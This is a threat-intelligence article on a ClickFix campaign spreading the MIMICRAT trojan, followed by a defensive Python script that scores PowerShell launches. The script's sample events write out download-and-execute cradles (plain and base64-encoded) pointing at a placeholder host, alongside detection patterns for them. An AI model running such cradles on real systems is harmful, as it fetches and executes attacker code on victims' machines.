A newly discovered campaign uses the "ClickFix" social-engineering trick to spread a previously unseen remote access trojan tracked as MIMICRAT. By relying on social engineering rather than software exploits, and by compromising trustworthy websites to act as delivery vectors, the operation sidesteps conventional security controls.

The malware, a multipurpose native C++ implant built for long-term stealth and persistence, puts organizations worldwide at risk. The attack sequence begins when a user visits a trusted website, such as a financial tool, that has been covertly injected with malicious JavaScript. The script displays a fake Cloudflare verification pop-up and instructs the victim to copy and run a specific PowerShell command, ostensibly to fix a browser error.

Because the victim pastes and runs the command themselves, the ClickFix tactic exploits user trust to bypass browser-based download protections entirely. Elastic analysts discovered the threat in early February 2026, noting that it evaded detection through a five-stage infection chain.

Figure: Bincheck.io page source displaying the injected script loading jq.php from investonline.in (Source: Elastic)

The researchers emphasized that the campaign targets multiple industries by dynamically localizing its lures into 17 languages, guaranteeing broad reach across geographies.

They also pointed out that the malware's modular design lets the attackers change tactics quickly. The final payload, MIMICRAT, offers capabilities including file-system manipulation, SOCKS5 tunneling, and Windows token theft. It communicates with its command-and-control servers over configurable HTTP profiles that blend in with legitimate web analytics traffic, while maintaining persistence on the host.

Because the malicious signals are hidden among ordinary background noise, this camouflage makes them hard for network defenders to spot.

Covert Infection and Implementation

The infection mechanism is built as a series of deliberate, obfuscated steps designed to evade modern defenses. After the initial PowerShell execution, a heavily obfuscated second script is downloaded that disables Event Tracing for Windows (ETW) and the Antimalware Scan Interface (AMSI).

This step blinds script scanning and ETW-based telemetry inside the PowerShell process, so the following phases can run on the victim's machine without raising the usual alerts. Once these bypasses are in place, a Lua-based loader decrypts the final shellcode and runs it entirely in memory.

Because MIMICRAT lives only in RAM, this fileless technique greatly reduces its on-disk footprint and complicates forensic analysis for teams trying to trace the intrusion. The custom Lua loader further muddles the attack flow.

Figure: Obfuscated PowerShell execution (Source: Elastic)

To defend against this threat, organizations should train users to recognize fake browser verification prompts and never paste commands they do not understand from a web page into a terminal.

Security teams should restrict PowerShell for ordinary users (the execution policy alone is not a security boundary; the lure's own command line can simply pass -ExecutionPolicy Bypass) and monitor for obfuscated command lines. Blocking known malicious domains and inspecting network traffic for MIMICRAT's distinctive communication patterns are also essential to break the attack chain before data exfiltration occurs.
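The monitoring advice above is concrete enough to put into code. The following is an added example, not Elastic's detection content and not anything from the campaign: a Python triage script that scores process-creation events for the traits a ClickFix paste produces (a PowerShell host spawned by explorer.exe, a hidden window, an execution-policy bypass, a download-and-execute cradle) and that decodes a -EncodedCommand argument so a cradle hidden behind base64 is scored the same as a plain one. The sample events, the example.invalid URL, the indicator weights and the alert threshold are all constructed assumptions for this illustration.

```python
"""Heuristic triage of process-creation events for ClickFix-style
PowerShell launches.

Added example, not Elastic's detection logic and not the campaign's code.
The events below are constructed and mirror the fields that Sysmon Event
ID 1 / Security 4688 telemetry exposes; the indicator weights and the
alert threshold are hypothetical tuning values.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Plaintext behind the constructed -EncodedCommand sample (placeholder URL).
PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/jq.php')"

# PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text.
ENCODED_SAMPLE = base64.b64encode(PLAINTEXT.encode("utf-16-le")).decode("ascii")

POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # lure pasted into the Run dialog: explorer.exe spawns powershell
        "parent": r"C:\Windows\explorer.exe",
        "image": POWERSHELL,
        "cmdline": 'powershell -w hidden -nop -ep bypass -c "iex (irm https://example.invalid/jq.php)"',
    },
    {   # same launch surface, but the cradle is hidden behind -EncodedCommand
        "parent": r"C:\Windows\explorer.exe",
        "image": POWERSHELL,
        "cmdline": f"powershell.exe -NoProfile -EncodedCommand {ENCODED_SAMPLE}",
    },
    {   # benign: an administrator running a script from a console
        "parent": r"C:\Windows\System32\cmd.exe",
        "image": POWERSHELL,
        "cmdline": r"powershell.exe -File C:\scripts\backup.ps1",
    },
]

# (name, pattern applied to the command line plus any decoded payload, weight)
CMDLINE_INDICATORS = [
    ("hidden_window",      re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I), 2),
    ("encoded_command",    re.compile(r"-e(?:c|nc?|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I), 3),
    ("exec_policy_bypass", re.compile(r"-e(?:p|xecutionpolicy)\s+bypass\b", re.I), 1),
    ("no_profile",         re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    ("invoke_expression",  re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    ("download_cradle",    re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|net\.webclient)\b", re.I), 2),
]
ENCODED_ARG = re.compile(r"-e(?:c|nc?|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
ALERT_THRESHOLD = 5  # hypothetical tuning value


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE plaintext behind a -EncodedCommand argument, or None."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        return raw.decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


@dataclass
class Verdict:
    index: int
    score: int
    hits: List[str] = field(default_factory=list)
    decoded: Optional[str] = None


def score_event(index: int, event: dict) -> Verdict:
    """Score one process-creation event; higher means more ClickFix-like."""
    verdict = Verdict(index=index, score=0)
    image = event["image"].lower()
    parent = event["parent"].lower()
    # A PowerShell host whose parent is explorer.exe is what a paste into the
    # Run dialog looks like; interactive admin use normally arrives via a console.
    if image.endswith(("powershell.exe", "pwsh.exe")) and parent.endswith("explorer.exe"):
        verdict.hits.append("explorer_parent")
        verdict.score += 3
    verdict.decoded = decode_encoded_command(event["cmdline"])
    # Scan the raw command line and the decoded payload together, so a cradle
    # wrapped in -EncodedCommand triggers the same indicators as a plain one.
    text = event["cmdline"] + ("\n" + verdict.decoded if verdict.decoded else "")
    for name, pattern, weight in CMDLINE_INDICATORS:
        if pattern.search(text):
            verdict.hits.append(name)
            verdict.score += weight
    return verdict


def detect(events, threshold: int = ALERT_THRESHOLD) -> List[Verdict]:
    """Return verdicts for the events whose score reaches the threshold."""
    return [v for v in (score_event(i, e) for i, e in enumerate(events)) if v.score >= threshold]


if __name__ == "__main__":
    for v in detect(SAMPLE_EVENTS):
        print(f"event {v.index}: score={v.score} hits={v.hits}")
        if v.decoded:
            print(f"  decoded: {v.decoded}")
```

Run against the constructed events, the two explorer-spawned launches are flagged and the console-launched backup script is not; the second verdict carries the decoded cradle so an analyst sees the download URL rather than a base64 blob. In production the same scoring would be fed from the endpoint's process-creation feed, and the weights tuned against the environment's own baseline of legitimate PowerShell use.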